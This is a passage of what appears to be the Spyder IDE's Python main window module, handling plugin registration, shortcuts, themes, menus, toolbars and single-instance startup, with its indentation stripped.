# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent")
sig_moved = Signal("QMoveEvent")
sig_layout_setup_ready = Signal(object) # Related to default layouts
# ---- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing its name.
"""
if plugin_name in PLUGIN_REGISTRY:
return PLUGIN_REGISTRY.get_plugin(plugin_name)
if error:
raise SpyderAPIError(f'Plugin "{plugin_name}" not found!')
return None
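# For example, console = self.get_plugin(Plugins.Console) returns the Console
# plugin instance, or raises SpyderAPIError if it is not registered and
# error=True.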
def get_dockable_plugins(self):
"""Get a list of all dockable plugins."""
dockable_plugins = []
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, (SpyderDockablePlugin, SpyderPluginWidget)):
dockable_plugins.append((plugin_name, plugin))
return dockable_plugins
def is_plugin_enabled(self, plugin_name):
"""Determine if a given plugin is going to be loaded."""
return PLUGIN_REGISTRY.is_plugin_enabled(plugin_name)
def is_plugin_available(self, plugin_name):
"""Determine if a given plugin is going to be loaded."""
return PLUGIN_REGISTRY.is_plugin_available(plugin_name)
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def register_plugin(self, plugin_name, external=False, omit_conf=False):
"""
Register a plugin in Spyder Main Window.
"""
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_plugin_compatibility_message(message)
return
# Connect Plugin Signals to main window methods
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Connect Main window Signals to plugin signals
self.sig_moved.connect(plugin.sig_mainwindow_moved)
self.sig_resized.connect(plugin.sig_mainwindow_resized)
# Register plugin
plugin._register(omit_conf=omit_conf)
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
if plugin_name == Plugins.Shortcuts:
for action, context, action_name in self.shortcut_queue:
self.register_shortcut(action, context, action_name)
self.shortcut_queue = []
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(action, context, action_name)
else:
self.shortcut_queue.append((action, context, action_name))
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(sc, context, name)
self.register_shortcut(
plugin.toggle_view_action, context, name)
else:
self.shortcut_queue.append((sc, context, name))
self.shortcut_queue.append(
(plugin.toggle_view_action, context, name))
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.shortcuts.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
shortcut = None
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.shortcuts.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
try:
self.widgetlist.remove(plugin)
except ValueError:
pass
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
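# Plugins may declare a TABIFY class attribute (a plugin name or a list of
# plugin names) stating where they prefer to be tabified; tabify_plugin below
# walks that list and falls back to `default` when TABIFY is not defined.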
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Stop if TABIFY is just [None] or an empty list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
# Show external plugins
if plugin.NAME in PLUGIN_REGISTRY.external_plugins:
plugin.get_widget().toggle_view(True)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure plugins are placed correctly when
# switching layouts.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle_exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugins do not need to call the Console plugin explicitly.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
# Set Windows app icon to use .ico file
if os.name == "nt":
qapp.setWindowIcon(ima.get_icon("windows_app_icon"))
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make Spyder quit when pressing Ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
self.shortcut_queue = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
# Mapping of new plugin identifiers vs old attribute
# names given for plugins, or to prevent collisions with other
# attributes, e.g. layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# ---- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
PLUGIN_REGISTRY.sig_plugin_ready.connect(
lambda plugin_name, omit_conf: self.register_plugin(
plugin_name, omit_conf=omit_conf))
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
# Instantiate internal Spyder 5 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPluginV2):
PLUGIN_REGISTRY.register_plugin(self, PluginClass,
external=False)
# Instantiate internal Spyder 4 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPlugin):
if plugin_name == Plugins.IPythonConsole:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=False)
plugin_instance.sig_exception_occurred.connect(
self.handle_exception)
else:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=False)
self.preferences.register_plugin_preferences(
plugin_instance)
# Instantiate external Spyder 5 plugins
for plugin_name in external_plugins:
if plugin_name in enabled_plugins:
PluginClass = external_plugins[plugin_name]
try:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=True)
# These attributes come from spyder.app.find_plugins to
# add plugins to the dependencies dialog
module = PluginClass._spyder_module_name
package_name = PluginClass._spyder_package_name
version = PluginClass._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (PluginClass, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = PLUGIN_REGISTRY.register_plugin(self, mod,
external=True)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if not hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.thirdparty_plugins.append(plugin)
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.plugins.mainmenu.api import (
ApplicationMenus, ToolsMenuSections, FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut,
id_='file_switcher')
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut,
id_='symbol_finder')
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None] + self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
id_='spyder_path_action')
from spyder.plugins.application.container import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = ApplicationActions.SpyderWindowsEnvVariables
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action,
before_section=ToolsMenuSections.External
)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
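# Plugins remain reachable as attributes of the main window (e.g.
# self.console); __getattr__ below first checks the old-name mapping and then
# falls back to looking the attribute up in the plugin registry.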
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the main window
as before, e.g. self.console or self.main.console, keeping the
same accessors as in previous versions.
"""
# Mapping of new plugin identifiers vs old attribute
# names given for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_name in PLUGIN_REGISTRY:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
# Tabify external plugins which were installed after Spyder was
# installed.
# Note: This is only necessary the first time a plugin is loaded.
# Afterwards, the plugin placement is recorded in the window hexstate,
# which is loaded by the layouts plugin during the next session.
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if plugin_instance.get_conf('first_time', True):
self.tabify_plugin(plugin_instance, Plugins.Console)
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin_name, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""
Actions to be performed only after the main window's `show` method
is triggered.
"""
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
# Call on_mainwindow_visible for all plugins.
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin.on_mainwindow_visible()
QApplication.processEvents()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Load project, if any.
# TODO: Remove this reference to projects once we can send the command
# line options to the plugins.
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# To avoid regressions, we shouldn't have loaded the modules
# below at this point.
if DEV is not None:
assert 'pandas' not in sys.modules
assert 'matplotlib' not in sys.modules
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
